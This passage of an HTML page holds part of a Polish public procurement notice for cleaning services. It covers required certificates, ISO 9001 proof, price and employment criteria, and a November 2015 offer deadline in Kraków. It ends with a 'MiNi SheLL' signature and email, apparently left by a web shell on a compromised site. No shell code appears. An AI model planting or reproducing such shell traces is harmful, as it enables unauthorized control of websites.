<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokument potwierdzający posiadanie Certyfikatu ISO 9001 lub zaświadczenia niezależnego podmiotu potwierdzającego zgodność działań Wykonawcy z normami jakościowymi.
W celu wykazania, że oferowane usługi odpowiadają wymaganiom określonym przez Zamawiającego jest posiadanie w okresie wykonywania usługi sprzątania
aktualnego certyfikatu ISO 9001 lub innego zaświadczenia niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Wskaźnik zatrudnienia pracowników u Zamawiającego na umowę o pracę - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.icimb.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> p.42/ZD.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.11.2015 godzina 09:00, miejsce: Sekretariat ul. Cementowa 8, 31-983 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com